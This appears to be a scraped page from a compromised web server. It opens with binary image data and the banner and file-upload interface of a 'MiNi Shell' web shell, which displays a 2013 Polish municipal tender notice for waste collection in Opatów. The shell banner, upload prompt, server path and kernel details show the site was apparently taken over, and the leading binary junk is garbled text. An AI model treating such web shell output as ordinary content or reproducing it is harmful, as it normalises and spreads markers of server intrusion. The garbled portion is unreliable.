JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130511/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130511/185680-N-2013.html

<p class="kh_header"><b>Opatów: Usługi związane z odbiorem i zagospodarowaniem odpadów komunalnych od właścicieli nieruchomości z terenu gminy Opatów</b><br>
<b>Numer ogłoszenia: 185680 - 2013; data zamieszczenia: 11.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Opatów , ul. Tadeusza Kościuszki 27, 42-152 Opatów, woj. śląskie, tel. 034 3196093, faks 034 3196081.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opatow.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z odbiorem i zagospodarowaniem odpadów komunalnych od właścicieli nieruchomości z terenu gminy Opatów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja usługi odbioru i zagospodarowania 
a) zmieszanych odpadów komunalnych o kodzie (20 03 01),
b) papier, tektura (20 01 01) oraz opakowania z papieru i tektury (15 01 01),
c) szkło (20 01 02) oraz opakowania ze szkła (15 01 07),
d) tworzywa sztuczne (20 01 39) oraz opakowania z tworzyw sztucznych (15 01 02),
e) metale (20 01 40) oraz opakowania z metali (15 01 04),
f) odpady wielkogabarytowe (20 03 07)
g) odpady kuchenne ulegające biodegradacji (20 01 08) oraz odpady ogrodowe i zielone (20 01 99, 20 02 01)
h) chemikalia (farby i lakiery, kleje, rozpuszczalniki),
i)  zmieszane odpady z budowy, remontów i demontażu - 17 09 04 inne niż wymienione w 17 09 01, 17 09 02 i 17 09 03.
Przedmiot zamówienia obejmuje załadunek, transport i zagospodarowanie odpadów od mieszkańców  gminy Opatów, z tym że zmieszane odpady komunalne (kod 20 03 01), odpady zielone (20 02 01) oraz pozostałości z sortowania, przeznaczone do składowania Wykonawca jest obowiązany przekazać do instalacji posiadającej status regionalnej instalacji do przetwarzania odpadów komunalnych  dla Regionu I zgodnie z Planem Gospodarki Odpadami dla Województwa Śląskiego 2014 lub w przypadku awarii bądź braku mocy przerobowej  tej instalacji do instalacji zastępczych wskazanych w Planie Gospodarki Odpadami dla Województwa Śląskiego 2014. W przypadku frakcji odpadów selektywnie zebranych w ramach zagospodarowania odpadów, Wykonawca obowiązany będzie do ich przekazania do instalacji odzysku unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r.o odpadach (Dz. U. z 2013 r., poz. 21)
4.2 Bezpośrednio sprzed nieruchomości będzie miała miejsce zbiórka następujących odpadów komunalnych:
- zmieszane odpady komunalne - zbierane do pojemnika,
- odpady segregowane (szkło, tworzywa sztuczne, metale, papier i tektura) - zbierane do - jednego pojemnika,
- odpady wielkogabarytowe.
Z punktów selektywnej Zbiórki Odpadów Komunalnych odbierane będą:
- odpady kuchenne ulegające biodegradacji oraz odpady ogrodowe i zielone,
- chemikalia,	
- zmieszane odpady z budowy, remontów i demontażu
4.3 Szacowana ilość odpadów:
Odpady odbierane bezpośrednio sprzed nieruchomości 
Odpady zmieszane 20 03 01 - Odpady komunalne 1200 Mg
Odpady selektywnie gromadzone w 1 pojemniku	
20 01 02 - Szkło
15 01 07 - opakowania ze szkła
20 01 40 - Metale
15 01 04 - opakowania z metali
20 01 39 - Tworzywa sztuczne
15 01 02 - op. z tworzyw sztucznych
20 01 01 - Papier i tektura
15 01 01 - opakowania z papieru 500 Mg
Odpady wielko - gabarytowe	
20 03 07 - Odpady wielkogabarytowe 30 Mg
Odpady odbierane z Punktów Selektywnej Zbiórki Odpadów Komunalnych
Odpady budowlane i rozbiórkowe
17 09 04 - Zmieszane odpady z budowy, remontów i demontażu - 
17 09 04 inne niż wymienione w 17 09 01, 17 09 02 i 17 09 03. - 10 Mg
Odpady kuchenne, zielone	
20 01 08 - Odpady kuchenne ulegające biodegradacji
20 01 99, 20 02 01 - odpady zielone i ogrodowe	 - 7 Mg
chemikalia	
20 01 13 Rozpuszczalniki
20 01 26 Oleje i tłuszcze inne niż wymienione w 20 01 25
20 01 27 Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne
20 01 28 Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27
20 01 29 Detergenty zawierające substancje niebezpieczne
20 01 30 Detergenty inne niż wymienione w 20 01 29	- 10 Mg
4.4 Ilość  wytwarzanych odpadów nie jest zależna od Zamawiającego.  Ustalone  ilości  są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb zamawiającego uwzględniając ilość odpadów wytworzonych przez mieszkańców gminy Opatów. Szacunkowa ilość odpadów przewidzianych do transportu wynosi ok. 1730 Mg odpadów odbieranych bezpośrednio sprzed posesji.
4.5 Podane powyżej ilości odpadów należy traktować jako orientacyjne i Wykonawcy nie przysługuje prawo odszkodowania za nieosiągnięcie wskazanych wielkości.
4.6  Usługa będzie wykonywana w dni robocze od poniedziałku do piątku.
4.7 Odpady gromadzone będą w standardowych pojemnikach, o pojemności zależnej od ilości mieszkańców zamieszkałych na danej posesji zgodnie z tabelą nr 2 w SIWZ.
4.8 Zamawiający wymaga, aby Wykonawca odbierał również odpady zgromadzone w pojemnikach innych niż wyżej określono lub też zgromadzonych poza tym pojemnikiem (np. zgromadzone w workach ).
4.9 Wykonawca wyposaży wskazane przez Zamawiającego nieruchomości zamieszkałe w 2 pojemniki o wskazanej w tabeli nr 2 pojemności na czas realizacji przedmiotowego zamówienia, nie później niż do 30 czerwca 2013 r. Pojemniki przeznaczone na odpady zbierane selektywnie powinny różnić się kolorystycznie od pojemników przeznaczonych do gromadzenia odpadów zmieszanych.
Dopuszcza się aby Wykonawca miał możliwość bieżącego zaopatrywania mieszkańców Gminy Opatów w worki o poj. 60 l lub 120 l na odpady szklane lub inne zbierane selektywnie. Worki te po zapełnieniu i zawiązaniu mogłyby być odbierane w dniu wywozu.
W trakcie realizacji zamówienia Wykonawca obowiązany będzie do wyposażenia nieruchomości w odpowiednie pojemniki zgodnie ze zgłoszeniem Zamawiającego. Dostarczenie pojemników na teren wskazanych nieruchomości nastąpi w ciągu 7 dni roboczych od dnia zgłoszenia przez Zamawiającego. Dotyczy to zmiany ilości lub wielkości pojemników na danej nieruchomości, bądź nowych nieruchomości, jeśli pojawią się w trakcie realizacji zamówienia.
4.10 Ilość gospodarstw przedstawionych w tabeli nr 2, nie jest zależna od Zamawiającego.  Ustalone  ilości  są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego uwzględniając powstawanie nowych gospodarstw oraz migrację ludności. Minimalna ilość gospodarstw przewidzianych do obsługi przez Wykonawcę wynosi 1587.
4.11 Wykonawca wyposaży gminny punkt selektywnej zbiórki odpadów w odpowiednie kontenery i pojemniki do gromadzenia odpadów:
a)	w odniesieniu do chemikaliów  - pojemnik 1100 l
b)	w odniesieniu do odpadów kuchennych, zielonych - kontener otwarty 10 m3 lub kilka mniejszych kontenerów, z możliwością zwiększenia częstotliwości wywozu tych odpadów. Podstawą rozliczenia za jednokrotny wywóz pozostaje pojemność 10 m3.
c)	w odniesieniu do odpadów budowlanych i rozbiórkowych - pojemnik 15 m3 lub inny.
 Punkty Selektywnej Zbiórki Odpadów Komunalnych  umiejscowione będą :
-  dla chemikaliów - Opatów, ul. T. Kościuszki 27
-  dla odpadów biodegradowalnych oraz
-  dla odpadów budowlanych i rozbiórkowych - teren w pobliżu Oczyszczalnia ścieków - Opatów, ul. T. Kościuszki , dz. nr ewid. 27.
Opróżnianie kontenerów następować będzie po wcześniejszym zgłoszeniu telefonicznym, jednak nie rzadziej niż raz na pół roku.
4.12 Częstotliwość odbioru poszczególnych frakcji odpadów:
Odpady zmieszane	
20 03 01- Odpady komunalne - 1 raz w miesiącu 
Odpady segregowane	
20 01 01 - Papier tektura
15 01 01 - Opakowania z papieru
20 01 39 - Tworzywa sztuczne
15 01 02 - Op. z tw. sztucznych
20 01 40 - Metale
15 01 04 - Opakowania z metali
20 01 02 - Szkło
15 01 07 - Opakowania ze szkła - 1 raz w miesiącu
Odpady wielkogabarytowe	
20 03 07 - Odpady wielkogabarytowe - 1 raz w roku
Odpady budowlane i rozbiórkowe - po zapełnieniu kontenera
17 09 04 - Zmieszane odpady z budowy, remontów i demontażu - 17 09 04 inne niż wymienione w 17 09 01, 17 09 02 i 17 09 03 - po zapełnieniu kontenera
Odpady kuchenne, zielone	
20 01 08 - Odpady kuchenne ulegające biodegradacji
20 01 99, 20 02 01 - odpady zielone i ogrodowe	 - po zapełnieniu kontenera
chemikalia	20 01 13 Rozpuszczalniki
20 01 26 Oleje i tłuszcze inne niż wymienione w 20 01 25
20 01 27 Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne
20 01 28 Farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27
20 01 29 Detergenty zawierające substancje niebezpieczne
20 01 30 Detergenty inne niż wymienione w 20 01 29	- po zapełnieniu kontenera
4.13  Wykonawca powinien dążyć do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami papieru, metalu, tworzyw sztucznych, szkła zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych.
4.14  Wykonawca powinien dążyć do osiągnięcia w danym roku kalendarzowym w odniesieniu do masy odebranych przez siebie odpadów komunalnych poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z Rozporządzeniem Ministra Środowiska z dnia 25 maja 2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów.
4.15 Załadunek jak i transport odpadów będzie odbywał się za pomocą odpowiedniego sprzętu, który musi być w dyspozycji Wykonawcy. Pojazdy winne być oznakowane w sposób czytelny i widoczny, umożliwiający łatwą identyfikację przedsiębiorcy poprzez umieszczenie na nich nazwy firmy, adresu i numeru telefonu przedsiębiorcy.
4.16 Pojazdy Wykonawcy w trakcie realizacji usług odbioru odpadów komunalnych realizowanych na rzecz Zamawiającego nie mogą jednocześnie odbierać odpadów komunalnych z nieruchomości niezamieszkałych, które nie są objęte gminnym systemem gospodarowania odpadami.
4.17 Wykonawca jest zobowiązany do:
bieżącego prowadzenia ewidencji odpadów odbieranych od właścicieli nieruchomości zamieszkałych, z uwzględnieniem ich kodów oraz prowadzenia wymaganej prawem sprawozdawczości,
bieżącego informowania Zamawiającego o wszystkich przypadkach niedopełnienia przez właścicieli nieruchomości zamieszkałych obowiązku w zakresie selektywnego zbierania odpadów komunalnych.
4.18 Wykonawca będzie przekazywał Zamawiającemu zgodnie z ustawą o utrzymaniu czystości i porządku w gminach do końca miesiąca następującego po kwartale którego dotyczy, kwartalne sprawozdania dotyczące:
informacji o masie poszczególnych rodzajów odebranych odpadów komunalnych oraz sposobie ich zagospodarowania wraz ze wskazaniem instalacji, do której zostały przekazane odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania,
informacji o masie odpadów komunalnych ulegających biodegradacji: przekazanych do składowania na składowisko odpadów oraz nieprzekazanych do składowania na składowisku odpadów i sposobie ich zagospodarowania,
liczbę właścicieli nieruchomości, od których zostały odebrane odpady komunalne,
wskazanie właścicieli nieruchomości, którzy zbierają odpady komunalne w sposób niezgodny z regulaminem,
kopii dowodów dostarczania odpadów do odzysku lub unieszkodliwiana np. karty ewidencji odpadów bądź karty przekazania odpadów.
4.19 Wykonawca obowiązany będzie do opracowania i dostarczenia mieszkańcom harmonogramu wywozu odpadów zmieszanych i segregowanych, który powinien określać datę i dzień tygodnia, w którym będzie realizowany wywóz, w terminie do 30 czerwca 2013 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.53.30.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest wnieść wadium w wysokości 10000 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że posiada: a) zezwolenie na
transport odpadów, o którym mowa w art. 28 ustawy z dnia 27 kwietnia 2001 r. o
odpadach (Dz. U. z 2010 r. Nr 185, poz 1243 z późn. zm.) w związku z art 233
ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U z 2013 r., poz. 21), w zakresie:15 01 01 Opakowania z papieru i tektury 15 01 02 Opakowania z tworzyw
sztucznych, 15 01 04 Opakowania z metali, 15 01 05 Opakowania wielomateriałowe,
15 01 07 Opakowania ze szkła, 20 01 01 Papier i tektura, 20 01 02 Szkło, 20 01 39
Tworzywa sztuczne, 20 01 40 Metale, 20 03 01 Zmieszane odpady komunalne, 20 03
07 Odpady wielkogabarytowe Zamawiający dokona oceny spełnienia wymaganych
warunków udziału w postępowaniu na podstawie złożonych do oferty dokumentów
według kryterium spełnia, nie spełnia. Wykonawca niespełniający któregokolwiek z
warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-
2 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że: w okresie ostatnich trzech lat
przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy niż 3 lata - w tym okresie, wykonał usługi polegające na odbiorze odpadów
komunalnych od właścicieli nieruchomości w sposób ciągły przez okres minimum
12 miesięcy przy czym łączna masa odpadów nie będzie mniejsza niż 500 Mg.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w
postępowaniu na podstawie złożonych do oferty dokumentów i oświadczeń według
kryterium spełnia, nie spełnia. Wykonawca niespełniający któregokolwiek z
warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-
2 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga, aby Wykonawca wykazał, że posiada: - co najmniej dwa
pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych - co
najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów
komunalnych, - co najmniej jeden pojazd do odbierania odpadów bez funkcji
kompaktującej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien posiadać osoby zdolne do wykonania zamówienia.
Zamawiający dokona oceny spełnienia wymaganych warunków udziału w
postępowaniu na podstawie złożonych do oferty dokumentów i oświadczeń według
kryterium spełnia, nie spełnia. Wykonawca niespełniający któregokolwiek z
warunków udziału w postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-
2 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien spełniać następujące warunki: znajdować się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający
dokona oceny spełnienia wymaganych warunków udziału w postępowaniu na
podstawie złożonych do oferty dokumentów i oświadczeń według kryterium spełnia,
nie spełnia. Wykonawca niespełniający któregokolwiek z warunków udziału w
postępowaniu zostanie wykluczony na podstawie art. 24 ust. 1-2 ustawy PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.opatow.akcessnet.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Opatów, ul. Kościuszki 27, 42-152 Opatów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 10:00, miejsce: Sekretariat Urzędu Gminy Opatów, ul. Kościuszki 27, 42-152 Opatów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com